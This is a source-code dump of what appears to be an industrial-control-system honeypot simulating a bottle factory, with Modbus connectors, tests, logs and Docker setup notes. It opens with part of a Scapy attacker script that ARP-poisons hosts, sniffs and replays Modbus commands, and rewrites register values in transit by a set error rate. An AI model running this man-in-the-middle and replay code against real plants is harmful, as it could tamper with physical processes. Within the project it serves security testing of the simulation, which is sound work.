138 | tcp_packet = ModbusTCP(pkt['TCP'].payload.load)
139 | if tcp_packet.Length == 7 or tcp_packet.Length == 11:
140 | if tcp_packet.Length == 7:
141 | modbus_packet = ModbusReadResponse(tcp_packet.payload.load)
142 | else: # tcp_packet.Length == 11:
143 | modbus_packet = ModbusWriteRequest(tcp_packet.payload.load)
144 |
145 | value = ScapyAttacker.modbus_base.decode([modbus_packet.Data0, modbus_packet.Data1])
146 |
147 | new_value = value + (value * ScapyAttacker.error)
148 | values = ScapyAttacker.modbus_base.encode(new_value)
149 |
150 | offset = len(new_packet['TCP'].payload.load) - 4
151 | new_packet['TCP'].payload.load = (
152 | new_packet['TCP'].payload.load[:offset] +
153 | values[0].to_bytes(2, 'big') +
154 | values[1].to_bytes(2, 'big'))
155 |
156 | reference = 0
157 | if tcp_packet.Length == 11:
158 | reference = modbus_packet.Reference
159 |
160 | command = ModbusCommand(
161 | pkt['IP'].src,
162 | pkt['IP'].dst,
163 | pkt['TCP'].dport,
164 | modbus_packet.Command,
165 | reference,
166 | value,
167 | new_value,
168 | datetime.now().timestamp()
169 | )
170 | ScapyAttacker.sniff_commands.append(command)
171 |
172 | del new_packet[IP].chksum
173 | del new_packet[IP].payload.chksum
174 | send(new_packet)
175 |
176 | @staticmethod
177 | def clear_sniffed():
178 | ScapyAttacker.sniff_commands = []
179 | ScapyAttacker.sniff_time = None
180 |
181 | @staticmethod
182 | def start_sniff(sniff_callback_func, filter_string, timeout):
183 | ScapyAttacker.clear_sniffed()
184 | ScapyAttacker.sniff_time = datetime.now().timestamp()
185 | sniff(prn=sniff_callback_func, filter=filter_string, timeout=timeout)
186 | print()
187 |
188 | @staticmethod
189 | def scan_link(target_ip, gateway_ip, timeout):
190 | # assuming we have performed the reverse attack, we know the following
191 | ScapyAttacker.clear_sniffed()
192 |
193 | target_mac = ScapyAttacker.get_mac_address(target_ip)
194 | gateway_mac = ScapyAttacker.get_mac_address(gateway_ip)
195 |
196 | ScapyAttacker.poison_arp_table(NetworkNode(gateway_ip, gateway_mac),
197 | NetworkNode(target_ip, target_mac))
198 | ScapyAttacker.start_sniff(ScapyAttacker.sniff_callback, "ip host " + target_ip, timeout)
199 | ScapyAttacker.restore_arp_table(NetworkNode(gateway_ip, gateway_mac),
200 | NetworkNode(target_ip, target_mac))
201 |
202 | return ScapyAttacker.sniff_commands
203 |
204 | @staticmethod
205 | def scan_network(destination, timeout):
206 | ScapyAttacker.clear_sniffed()
207 |
208 | nodes = ScapyAttacker.discovery(destination)
209 | ScapyAttacker.poison_arp_tables(nodes)
210 | ScapyAttacker.start_sniff(ScapyAttacker.sniff_callback, "", timeout)
211 | ScapyAttacker.restore_arp_tables(nodes)
212 |
213 | return ScapyAttacker.sniff_commands
214 |
215 | @staticmethod
216 | def inject_link(target_ip, gateway_ip, timeout):
217 | target_mac = ScapyAttacker.get_mac_address(target_ip)
218 | gateway_mac = ScapyAttacker.get_mac_address(gateway_ip)
219 |
220 | ScapyAttacker.poison_arp_table(NetworkNode(gateway_ip, gateway_mac),
221 | NetworkNode(target_ip, target_mac))
222 | ScapyAttacker.start_sniff(ScapyAttacker.inject_callback, "ip host " + target_ip, timeout)
223 | ScapyAttacker.restore_arp_table(NetworkNode(gateway_ip, gateway_mac),
224 | NetworkNode(target_ip, target_mac))
225 |
226 | @staticmethod
227 | def inject_network(destination, timeout):
228 | nodes = ScapyAttacker.discovery(destination)
229 | ScapyAttacker.poison_arp_tables(nodes)
230 | ScapyAttacker.start_sniff(ScapyAttacker.inject_callback, "", timeout)
231 | ScapyAttacker.restore_arp_tables(nodes)
232 |
233 | @staticmethod
234 | def scan_attack(destination, log):
235 | nodes = ScapyAttacker.discovery(destination)
236 | log.info('# Found {} nodes in the network {}:'.format(len(nodes), destination))
237 | for node in nodes:
238 | log.info(str(node))
239 |
240 | @staticmethod
241 | def replay_attack(mode, destination, sniff_time, replay_cnt, log):
242 | if mode == "network":
243 | ScapyAttacker.scan_network(destination, sniff_time)
244 | elif mode == "link":
245 | ScapyAttacker.scan_link(destination.split(",")[0], destination.split(",")[1], sniff_time)
246 | else:
247 | raise Exception("arg \'mode\' value not recognized. Should be \'network\' or \'link\'")
248 |
249 | for i in range(replay_cnt):
250 | print("Replaying {}".format(i))
251 | start = datetime.now().timestamp()
252 | for command in ScapyAttacker.sniff_commands:
253 | delay = (command.time - ScapyAttacker.sniff_time) - (datetime.now().timestamp() - start)
254 | if delay > 0:
255 | time.sleep(delay)
256 | command.send_fake()
257 |
258 | log.info('# Sniffed {} packets in the network {}:'.format(len(ScapyAttacker.sniff_commands), destination))
259 | for cmd in ScapyAttacker.sniff_commands:
260 | log.info(str(cmd))
261 |
262 | print('# Replayed sniffed commands for {} times'.format(replay_cnt))
263 |
264 | @staticmethod
265 | def mitm_attack(mode, destination, sniff_time, error, log):
266 | ScapyAttacker.error = error
267 | if mode == "network":
268 | ScapyAttacker.inject_network(destination, sniff_time)
269 | elif mode == "link":
270 | ScapyAttacker.inject_link(destination.split(",")[0], destination.split(",")[1], sniff_time)
271 | else:
272 | raise Exception("arg \'mode\' value not recognized. Should be \'network\' or \'link\'")
273 |
274 | log.info('# Changed {} packets in the network {}:'.format(len(ScapyAttacker.sniff_commands), destination))
275 | for cmd in ScapyAttacker.sniff_commands:
276 | log.info(str(cmd))
277 |
278 |
279 | if __name__ == '__main__':
280 | parser = argparse.ArgumentParser(description='Scapy-based ICS network attacker')
281 | parser.add_argument('--output', metavar='',
282 | help='csv file to output', required=True)
283 | parser.add_argument('--attack', metavar='ATTACK',
284 | help='attack type: scan, replay, or mitm', required=True)
285 |
286 | parser.add_argument('--mode', metavar='MODE',
287 | type=str, default='network',
288 | help='apply mode for MITM and replay attacks: network or link', required=False)
289 |
290 | parser.add_argument('--timeout', metavar='SECONDS', type=int, default=10,
291 | help='sniffing duration in seconds for MITM and replay attacks',
292 | required=False)
293 |
294 | parser.add_argument('--destination', metavar='DESTINATION',
295 | help='attack destination: a CIDR range, or "target,gateway" in link mode', required=False)
296 | parser.add_argument('--parameter', metavar='PARAMETER', type=float, default=5,
297 | help='attack parameter: replay count for replay, error rate for MITM', required=False)
298 |
300 | args = parser.parse_args()
301 |
302 | handler = logging.FileHandler(args.output, mode="w")
303 | handler.setFormatter(logging.Formatter('%(message)s'))
304 | logger = logging.getLogger(args.attack)
305 | logger.setLevel(logging.INFO)
306 | logger.addHandler(handler)
307 |
308 | if args.attack == 'scan':
309 | ScapyAttacker.scan_attack(args.destination, logger)
310 |
311 | if args.attack == 'replay':
312 | ScapyAttacker.replay_attack(args.mode, args.destination, args.timeout, int(args.parameter), logger)
313 |
314 | if args.attack == 'mitm':
315 | ScapyAttacker.mitm_attack(args.mode, args.destination, args.timeout, args.parameter, logger)
316 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/configs.py:
--------------------------------------------------------------------------------
1 | class SpeedConfig:
2 | # Constants
3 | SPEED_MODE_FAST = 'fast'
4 | SPEED_MODE_MEDIUM = 'medium'
5 | SPEED_MODE_SLOW = 'slow'
6 |
7 | PLC_PERIOD = {
8 | SPEED_MODE_FAST: 200,
9 | SPEED_MODE_MEDIUM: 500,
10 | SPEED_MODE_SLOW: 1000
11 | }
12 | PROCESS_PERIOD = {
13 | SPEED_MODE_FAST: 50,
14 | SPEED_MODE_MEDIUM: 100,
15 | SPEED_MODE_SLOW: 200
16 | }
17 |
18 | # you can configure SPEED_MODE here
19 | SPEED_MODE = SPEED_MODE_FAST
20 |
21 | DEFAULT_PLC_PERIOD_MS = PLC_PERIOD[SPEED_MODE]
22 | DEFAULT_FP_PERIOD_MS = PROCESS_PERIOD[SPEED_MODE]
23 |
24 |
25 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/connectors.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sqlite3
3 | import memcache
4 | from abc import abstractmethod, ABC
5 | from os.path import splitext
6 |
8 |
9 | from ics_sim.helper import debug, error, validate_type
10 | import json
11 |
12 | from ics_sim.protocol import ClientModbus
13 |
14 |
15 | class Connector(ABC):
16 | """Base class for key-value connectors."""
18 | def __init__(self, connection):
19 | # TODO: Check the input
20 | self._name = connection['name']
21 | self._path = connection['path']
22 | self._connection = connection
23 |
24 | @abstractmethod
25 | def initialize(self, values, clear_old=False):
26 | pass
27 |
28 | @abstractmethod
29 | def set(self, key, value):
30 | pass
31 |
32 | @abstractmethod
33 | def get(self, key):
34 | pass
35 |
36 |
37 | class SQLiteConnector(Connector):
38 | def __init__(self, connection):
39 | Connector.__init__(self, connection)
40 | self._key = 'name'
41 | self._value = 'value'
42 |
43 | def initialize(self, values, clear_old=True):
44 | if clear_old and os.path.isfile(self._path):
45 | os.remove(self._path)
46 |
47 | schema = """
48 | CREATE TABLE {} (
49 | {} TEXT NOT NULL,
50 | {} REAL,
51 | PRIMARY KEY ({})
52 | );
53 | """.format(self._name, self._key, self._value, self._key)
54 | with sqlite3.connect(self._path) as conn:
55 | conn.executescript(schema)
56 |
57 | init_template = """
58 | INSERT INTO {}""".format(self._name) + " VALUES ('{}', {});"
59 |
60 | schema_init = ""
61 | for item in values:
62 | schema_init += init_template.format(*item)
63 |
64 | with sqlite3.connect(self._path) as conn:
65 | conn.executescript(schema_init)
66 |
67 | def set(self, key, value):
68 | set_query = 'UPDATE {} SET {} = ? WHERE {} = ?'.format(
69 | self._name,
70 | self._value,
71 | self._key)
72 | with sqlite3.connect(self._path) as conn:
73 | try:
74 | cursor = conn.cursor()
75 | cursor.execute(set_query, [value, key])
76 | conn.commit()
77 | return value
78 |
79 | except sqlite3.Error as e:
80 | error('_set %s: ' % e.args[0])
81 |
82 | def get(self, key):
83 | get_query = """SELECT {} FROM {} WHERE {} = ?""".format(
84 | self._value,
85 | self._name,
86 | self._key)
87 |
88 | with sqlite3.connect(self._path) as conn:
89 | try:
90 |
91 | cursor = conn.cursor()
92 | cursor.execute(get_query, [key])
93 | record = cursor.fetchone()
94 | return record[0]
95 |
96 | except sqlite3.Error as e:
97 | error('_get %s: ' % e.args[0])
98 |
99 |
100 | class MemcacheConnector(Connector):
101 | def __init__(self, connection):
102 | Connector.__init__(self, connection)
103 | self._key = 'name'
104 | self._value = 'value'
105 | self.memcached_client = memcache.Client([self._path], debug=0)
106 |
107 |
108 | def initialize(self, values, clear_old=False):
109 | if clear_old:
110 | os.system('/etc/init.d/memcached restart')
111 |
112 | for key, value in values:
113 | self.memcached_client.set(key, value)
114 |
115 | def set(self, key, value):
116 | self.memcached_client.set(key, value)
117 |
118 | def get(self, key):
119 | return self.memcached_client.get(key)
120 |
121 | def __del__(self):
122 | self.memcached_client.disconnect_all()
123 |
124 |
125 | class HardwareConnector(Connector, ABC):
126 | def __init__(self, connection):
127 | Connector.__init__(self, connection)
128 | path = self._path
129 | self.__IP = path.split(':')[0]
130 | self.__port = int(path.split(':')[1])
131 | self.__clientModbus = ClientModbus(self.__IP, self.__port)
132 |
133 | def get(self, key):
134 | return self.__clientModbus.receive(key)
135 |
136 | def set(self, key, value):
137 | self.__clientModbus.send(key, value)
138 |
139 |
140 | class FileConnector(Connector):
141 | def __init__(self, connection):
142 | Connector.__init__(self, connection)
143 |
144 | def initialize(self, values, clear_old=True):
145 | if not os.path.isfile(self._path):
146 | f = open(self._path, "x")
147 | obj = json.dumps(values)
148 | f.write(obj)
149 | f.close()
150 |
151 | def set(self, key, value):
152 | # read current contents, update the key, then rewrite the file
153 | with open(self._path) as f:
154 | data = json.load(f)
155 | data[key] = value
156 | with open(self._path, 'w') as f:
157 | json.dump(data, f)
158 |
159 | def get(self, key):
160 | f = open(self._path)
161 | data = json.load(f)
162 | f.close()
163 | return data[key]
164 |
165 |
166 | class ConnectorFactory:
167 | @staticmethod
168 | def build(connection):
169 | validate_type(connection, 'connection', dict)
170 |
171 | connection_keys = connection.keys()
172 | if (not connection_keys) or (len(connection_keys) != 3):
173 | raise KeyError('Connection must contain 3 keys.')
174 | else:
175 | for key in connection_keys:
176 | if (key != 'path') and (key != 'name') and (key != 'type'):
177 | raise KeyError('%s is an invalid key.' % key)
178 |
179 | if connection['type'] == 'sqlite':
180 | sub_path, extension = splitext(connection['path'])
181 | if extension == '.sqlite':
182 | return SQLiteConnector(connection)
183 | else:
184 | raise ValueError('%s is not acceptable extension for type sqlite.' % extension)
185 |
186 | elif connection['type'] == 'file':
187 | return FileConnector(connection)
188 |
189 | elif connection['type'] == 'hardware':
190 | return HardwareConnector(connection)
191 |
192 | elif connection['type'] == 'memcache':
193 | return MemcacheConnector(connection)
194 |
195 | else:
196 | raise ValueError('Connection type is not supported')
197 |
198 |
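FileConnector above updates a JSON file in place; the safe pattern is to read the document fully before reopening it for writing, since opening with `'w'` truncates the file. A minimal standalone sketch of that read-modify-write cycle (the helper names `file_set`/`file_get` and the temp path are illustrative, not part of the library):

```python
import json
import os
import tempfile

def file_set(path, key, value):
    with open(path) as f:           # read the current JSON document first
        data = json.load(f)
    data[key] = value
    with open(path, 'w') as f:      # only now truncate and rewrite
        f.write(json.dumps(data))

def file_get(path, key):
    with open(path) as f:
        return json.load(f)[key]

# create a throwaway file and exercise the round trip
path = os.path.join(tempfile.mkdtemp(), 'state.json')
with open(path, 'w') as f:
    f.write(json.dumps({'value1': 1}))

file_set(path, 'value1', 10)
print(file_get(path, 'value1'))  # 10
```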
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/helper.py:
--------------------------------------------------------------------------------
1 | import time
2 |
3 |
4 | def validate_type(variable, variable_name: str, variable_type: type):
5 |     if type(variable) is not variable_type:
6 |         raise TypeError('{0} type is not valid for {1}.'.format(type(variable), variable_name))
7 |     elif not variable:
8 |         raise ValueError('Empty {0} is not valid.'.format(variable_name))
9 |
10 |
11 | def current_milli_time():
12 | return round(time.time() * 1000)
13 |
14 |
15 | def current_milli_cycle_time(cycle):
16 | return round(time.time() * 1000 / cycle) * cycle
17 |
18 |
19 | def debug(msg):
20 | print('DEBUG: ', msg)
21 |
22 |
23 | def error(msg):
24 | print('ERROR: ', msg)
25 |
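The intent of `validate_type` can be shown with a standalone re-declaration (a sketch, assuming the emptiness check is meant to inspect the value itself rather than the type argument):

```python
def validate_type(variable, variable_name: str, variable_type: type):
    # Wrong type is a TypeError; an empty value of the right type is a ValueError.
    if type(variable) is not variable_type:
        raise TypeError('{0} type is not valid for {1}.'.format(type(variable), variable_name))
    elif not variable:
        raise ValueError('Empty {0} is not valid.'.format(variable_name))


validate_type({'type': 'file'}, 'connection', dict)  # passes silently

try:
    validate_type('not-a-dict', 'connection', dict)
except TypeError as err:
    print(err)  # <class 'str'> type is not valid for connection.
```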
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/protocol.py:
--------------------------------------------------------------------------------
1 | from pyModbusTCP.client import ModbusClient
2 | from pyModbusTCP.server import ModbusServer, DataBank
3 |
4 |
5 | class Client:
6 | def __init__(self, ip, port):
7 | self.ip = ip
8 | self.port = port
9 |
10 | def receive(self, tag_id):
11 | pass
12 |
13 | def send(self, tag_id, value):
14 | pass
15 |
16 |
17 | class Server:
18 | def __init__(self, ip, port):
19 | self.ip = ip
20 | self.port = port
21 |
22 | def start(self):
23 | pass
24 |
25 | def stop(self):
26 | pass
27 |
28 | def set(self, tag_id, value):
29 | pass
30 |
31 | def get(self, tag_id):
32 | pass
33 |
34 |
35 | class ModbusBase:
36 | def __init__(self, word_num=2, precision=4):
37 | self._precision = precision
38 | self._word_num = word_num
39 | self._precision_factor = pow(10, precision)
40 | self._base = pow(2, 16)
41 | self._max_int = pow(self._base, word_num)
42 |
43 | def decode(self, word_array):
44 |
45 | if len(word_array) != self._word_num:
46 | raise ValueError('word array length is not correct')
47 |
48 |         result = 0
49 |
50 |         for word in word_array:
51 |             # big-endian: most-significant word first
52 |             result = result * self._base + word
53 |
54 |         return result / self._precision_factor
57 |
58 | def encode(self, number):
59 |
60 | number = int(number * self._precision_factor)
61 |
62 |         if number >= self._max_int:
63 |             raise ValueError('input number exceeds the max limit')
64 |
65 |         result = []
66 |         while number:
67 |             result.append(number % self._base)
68 |             number //= self._base
69 |
70 | while len(result) < self._word_num:
71 | result.append(0)
72 |
73 | result.reverse()
74 | return result
75 |
76 | def get_registers(self, index):
77 | return index * self._word_num
78 |
79 |
80 | class ClientModbus(Client, ModbusBase):
81 | def __init__(self, ip, port):
82 | ModbusBase.__init__(self)
83 | Client.__init__(self, ip, port)
84 | self.client = ModbusClient(host=self.ip, port=self.port)
85 |
86 | def receive(self, tag_id):
87 | self.open()
88 | return self.decode(self.client.read_holding_registers(self.get_registers(tag_id), self._word_num))
89 |
90 | def send(self, tag_id, value):
91 | self.open()
92 | self.client.write_multiple_registers(self.get_registers(tag_id), self.encode(value))
93 |
94 | def open(self):
95 | if not self.client.is_open:
96 | self.client.open()
97 |
98 | def close(self):
99 | if self.client.is_open:
100 | self.client.close()
101 |
102 |
103 | class ServerModbus(Server, ModbusBase):
104 | def __init__(self, ip, port):
105 | ModbusBase.__init__(self)
106 | Server.__init__(self, ip, port)
107 | self.server = ModbusServer(ip, port, no_block=True)
108 |
109 | def start(self):
110 | self.server.start()
111 |
112 | def stop(self):
113 | self.server.stop()
114 |
115 | def set(self, tag_id, value):
116 |         self.server.data_bank.set_holding_registers(self.get_registers(tag_id), self.encode(value))
117 | #DataBank.set_words(self.get_registers(tag_id), self.encode(value))
118 |
119 | def get(self, tag_id):
120 | return self.decode(self.server.data_bank.get_holding_registers(self.get_registers(tag_id), self._word_num))
121 | #return self.decode(DataBank.get_words(self.get_registers(tag_id), self._word_num))
122 |
123 |
124 |
125 | class ProtocolFactory:
126 | @staticmethod
127 | def create_client(protocol, ip, port):
128 | if protocol == 'ModbusWriteRequest-TCP':
129 | return ClientModbus(ip, port)
130 | else:
131 |             raise TypeError('unsupported client protocol: {}'.format(protocol))
132 |
133 | @staticmethod
134 | def create_server(protocol, ip, port):
135 | if protocol == 'ModbusWriteRequest-TCP':
136 | return ServerModbus(ip, port)
137 | else:
138 |             raise TypeError('unsupported server protocol: {}'.format(protocol))
139 |
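The word packing ModbusBase performs can be reproduced in a standalone sketch (the function names here are illustrative; the parameters mirror the class defaults `word_num=2`, `precision=4`): a value is scaled by `10**precision` and split into big-endian 16-bit words suitable for Modbus holding registers.

```python
# Standalone sketch of ModbusBase's value packing, not the library code itself.
BASE = 2 ** 16  # one Modbus register holds a 16-bit word

def encode(number, word_num=2, precision=4):
    scaled = int(number * 10 ** precision)
    if scaled >= BASE ** word_num:
        raise ValueError('input number exceeds the max limit')
    words = []
    for _ in range(word_num):
        words.append(scaled % BASE)
        scaled //= BASE
    words.reverse()  # most-significant word first
    return words

def decode(words, precision=4):
    result = 0
    for word in words:
        result = result * BASE + word
    return result / 10 ** precision

print(encode(7654))          # [1167, 59488]
print(decode(encode(7654)))  # 7654.0
```

Note that values with more than `precision` decimal places are truncated by the scaling step, which is why the unit tests round before comparing.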
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-Attacker.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:22,261 INFO [Attacker] Created
2 | 2022-09-20 14:56:22,285 INFO [Attacker] started
3 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-AttackerMachine.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:22,717 INFO [AttackerMachine] Created
2 | 2022-09-20 14:56:22,734 INFO [AttackerMachine] started
3 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-Factory.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:12,865 INFO [Factory] Created
2 | 2022-09-20 14:56:12,944 INFO [Factory] started
3 | 2022-09-20 15:12:42,209 WARNING [Factory] water is wasting
4 | 2022-09-20 15:17:37,412 WARNING [Factory] water is wasting
5 | 2022-09-20 15:17:37,502 WARNING [Factory] water is wasting
6 | 2022-09-20 15:20:28,019 WARNING [Factory] water is wasting
7 | 2022-09-20 15:20:28,105 WARNING [Factory] water is wasting
8 | 2022-09-20 15:42:06,619 WARNING [Factory] water is wasting
9 | 2022-09-20 15:52:33,402 WARNING [Factory] water is wasting
10 | 2022-09-20 15:52:33,504 WARNING [Factory] water is wasting
11 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-HMI1.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:11,727 INFO [HMI1] Created
2 | 2022-09-20 14:56:11,780 INFO [HMI1] started
3 | 2022-09-20 15:56:08,076 WARNING [HMI1] object of type 'NoneType' has no len()
4 | 2022-09-20 15:56:51,818 WARNING [HMI1] object of type 'NoneType' has no len()
5 | 2022-09-20 15:57:43,629 WARNING [HMI1] object of type 'NoneType' has no len()
6 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-HMI2.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 12:56:14,123 INFO [HMI2] Created
2 | 2022-09-20 12:56:14,224 INFO [HMI2] started
3 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-HMI3.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:13,040 INFO [HMI3] Created
2 | 2022-09-20 14:56:13,061 INFO [HMI3] started
3 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-PLC1.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:14,471 INFO [PLC1] Created
2 | 2022-09-20 14:56:14,474 INFO [PLC1] creating the server on IP = 192.168.0.11:502
3 | 2022-09-20 14:56:14,504 INFO [PLC1] started
4 |
--------------------------------------------------------------------------------
/bottlefactory/src/logs/logs-PLC2.log:
--------------------------------------------------------------------------------
1 | 2022-09-20 14:56:14,446 INFO [PLC2] Created
2 | 2022-09-20 14:56:14,454 INFO [PLC2] creating the server on IP = 192.168.0.12:502
3 | 2022-09-20 14:56:14,497 INFO [PLC2] started
4 |
--------------------------------------------------------------------------------
/bottlefactory/src/start.py:
--------------------------------------------------------------------------------
1 | from Configs import Connection
2 | from FactorySimulation import FactorySimulation
3 | from PLC1 import PLC1
4 | from PLC2 import PLC2
5 |
6 | from ics_sim.connectors import ConnectorFactory
16 |
17 | factory = FactorySimulation()
18 | factory.start()
19 |
20 |
21 | plc1 = PLC1()
22 | plc1.set_record_variables(True)
23 | plc1.start()
24 |
25 |
26 | plc2 = PLC2()
27 | plc2.set_record_variables(True)
28 | plc2.start()
29 |
30 | """
31 |
32 | connector = ConnectorFactory.build(Connection.File_CONNECTION)
33 | """
34 |
--------------------------------------------------------------------------------
/bottlefactory/src/start.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 |
5 | name="$1"
6 | if [ -z "$name" ]
7 | then
8 |     echo "start command needs a module_name to initiate!"
9 |     exit 1
10 | fi
11 |
12 | if [[ $name = "FactorySimulation.py" ]]
13 | then
14 |
15 |     #IP=$(hostname -I)
16 |     #IP_STR=${IP// /,}
17 |     sudo memcached -d -u nobody -l 127.0.0.1:11211,192.168.1.31
18 |     sudo service memcached start
19 |
20 | fi
21 |
22 | if [ "$name" = "PLC1.py" ] || [ "$name" = "PLC2.py" ] || [ "$name" = "HMI1.py" ] || [ "$name" = "HMI2.py" ] || [ "$name" = "HMI3.py" ] || [ "$name" = "FactorySimulation.py" ]
23 | then
24 |     python3 "$name"
25 | else
26 |     echo "there is no command with name: $name"
27 | fi
--------------------------------------------------------------------------------
/bottlefactory/src/storage/PhysicalSimulation1.sqlite:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/bottlefactory/src/storage/PhysicalSimulation1.sqlite
--------------------------------------------------------------------------------
/bottlefactory/src/tests/connectionTests.py:
--------------------------------------------------------------------------------
1 | import unittest
2 | from Configs import Connection
3 |
4 |
5 | from ics_sim.connectors import SQLiteConnector, MemcacheConnector, ConnectorFactory
6 |
7 |
8 | class ConnectionTests(unittest.TestCase):
9 |
10 | def test_sqlite_connection(self):
11 | try:
12 |
13 | connection = SQLiteConnector(Connection.SQLITE_CONNECTION)
14 |
15 | value1 = 1
16 | value2 = 2
17 |
18 | connection.initialize([('value1', value1), ('value2', value2)])
19 |
20 | retrieved_value1 = connection.get('value1')
21 |             self.assertEqual(retrieved_value1, value1, 'get function in sqliteConnection is not working correctly')
22 |
23 | value1 = 10
24 | connection.set('value1', value1)
25 | retrieved_value1 = connection.get('value1')
26 | self.assertEqual(retrieved_value1, value1, 'set function in sqliteConnection is not working correctly')
27 |
28 |
29 | except Exception:
30 | self.fail("cannot init values in the connection!")
31 |
32 | def test_memcache_connection(self):
33 | try:
34 | connection = MemcacheConnector(Connection.MEMCACHE_LOCAL_CONNECTION)
35 | value1 = 1
36 | value2 = 2
37 | connection.initialize([('value1', value1), ('value2', value2)])
38 |
39 | retrieved_value1 = connection.get('value1')
40 | self.assertEqual(retrieved_value1, value1, 'get function in MemcacheConnection is not working correctly')
41 |
42 | value1 = 10
43 | connection.set('value1', value1)
44 | retrieved_value1 = connection.get('value1')
45 | self.assertEqual(retrieved_value1, value1, 'set function in MemcacheConnection is not working correctly')
46 |
47 |
48 | except Exception:
49 | self.fail("cannot init values in the connection!")
50 |
51 | def test_connection_factory(self):
52 | try:
53 | connection = ConnectorFactory.build(Connection.MEMCACHE_LOCAL_CONNECTION)
54 | value1 = 10
55 | connection.set('value1', value1)
56 | retrieved_value1 = connection.get('value1')
57 | self.assertEqual(retrieved_value1, value1, 'set function in MemcacheConnection is not working correctly')
58 | connection = ConnectorFactory.build(Connection.SQLITE_CONNECTION)
59 | value1 = 10
60 | connection.set('value1', value1)
61 | retrieved_value1 = connection.get('value1')
62 |             self.assertEqual(retrieved_value1, value1, 'set function in sqliteConnection is not working correctly')
63 |
64 | except Exception:
65 | self.fail("cannot init values in the connection!")
66 |
--------------------------------------------------------------------------------
/bottlefactory/src/tests/modbusBaseTest.py:
--------------------------------------------------------------------------------
1 | import time
2 | import unittest
3 | from ics_sim.helper import debug
4 | from pyModbusTCP.server import ModbusServer, DataBank
5 |
6 | from ics_sim.protocol import ClientModbus, ServerModbus, ModbusBase
7 |
8 |
9 | class ProtocolTests(unittest.TestCase):
10 |
11 | def test_ModbusBase(self):
12 | modbus_base = ModbusBase()
13 |
14 |         self.modbusBase_func(modbus_base, 0)
15 |         self.modbusBase_func(modbus_base, .001)
16 |         self.modbusBase_func(modbus_base, .000001)
17 |         self.modbusBase_func(modbus_base, 1)
18 |         self.modbusBase_func(modbus_base, 7654)
19 |         self.modbusBase_func(modbus_base, 70000)
20 |
21 |     def modbusBase_func(self, modbus_base, number):
22 | words = modbus_base.encode(number)
23 | new_number = modbus_base.decode(words)
24 | number = round(number, modbus_base._precision)
25 | self.assertEqual(number, new_number, 'encoding and decoding is wrong ({})'.format(number))
26 |
27 | def test_ModbusServer(self):
28 | server = ModbusServer('127.0.0.1', 5001, no_block=True)
29 | server.start()
30 | server.data_bank.set_holding_registers(5,[10])
31 | received = server.data_bank.get_holding_registers(5,1)[0]
32 | server.stop()
33 |
34 | self.assertEqual(10, received, 'server read write is not compatible')
35 |
36 | def test_ServerModbus(self):
37 | server = ServerModbus('127.0.0.1', 5001)
38 | server.start()
39 |
40 | self.server_modbus_func(0, 0, server)
41 | self.server_modbus_func(0, 10, server)
42 | self.server_modbus_func(0, 10.1, server)
43 | self.server_modbus_func(0, 10.654, server)
44 | self.server_modbus_func(0, 10.654321, server)
45 |
46 | self.server_modbus_func(5, 0, server)
47 | self.server_modbus_func(5, 10, server)
48 | self.server_modbus_func(5, 10.1, server)
49 | self.server_modbus_func(5, 10.654, server)
50 | self.server_modbus_func(5, 10.654321, server)
51 |
52 | server.stop()
53 |
54 | def server_modbus_func(self, tag_id, value, server):
55 | server.set(tag_id, value)
56 | received = server.get(tag_id)
57 | value = round(value, server._precision)
58 | self.assertEqual(value, received, 'test_ServerModbus fails on value = {}'.format(value))
59 |
60 |
61 | def test_client_server_modbus(self):
62 | client = ClientModbus('127.0.0.1', 5001)
63 | server = ServerModbus('127.0.0.1', 5001)
64 | server.start()
65 |
66 | self.client_server_modbus_func(server, client, 0, 10)
67 | self.client_server_modbus_func(server, client, 0, 0)
68 | self.client_server_modbus_func(server, client, 0, 1.2)
69 | self.client_server_modbus_func(server, client, 3, 1.2)
70 | self.client_server_modbus_func(server, client, 3, 7563.42)
71 |
72 | server.stop()
73 | client.close()
74 |
75 | def client_server_modbus_func(self, server, client, tag_id, value):
76 | server.set(tag_id, value)
77 | received = client.receive(tag_id)
78 | value = round(value, server._precision)
79 | self.assertEqual(value, received,'test_client_server_modbus fails on tag_id={} and value={}'.format(tag_id, value))
80 |
81 |
82 | if __name__ == '__main__':
83 | unittest.main()
--------------------------------------------------------------------------------
/bottlefactory/src/tests/storage/PhysicalSimulation1.sqlite:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/bottlefactory/src/tests/storage/PhysicalSimulation1.sqlite
--------------------------------------------------------------------------------
/doc/doc.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/doc/doc.md
--------------------------------------------------------------------------------
/doc/docker.md:
--------------------------------------------------------------------------------
1 | ## Install Docker using the repository
2 | 1. Update the apt package index and install packages to allow apt to use a repository over HTTPS:
3 |
4 | ``` bash
5 | sudo apt-get update
6 | sudo apt-get install \
7 | ca-certificates \
8 | curl \
9 | gnupg \
10 | lsb-release
11 | ```
12 |
13 |
14 | 2. Add Docker’s official GPG key:
15 |
16 | ``` shell
17 |
18 | sudo mkdir -p /etc/apt/keyrings
19 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg
20 | ```
21 |
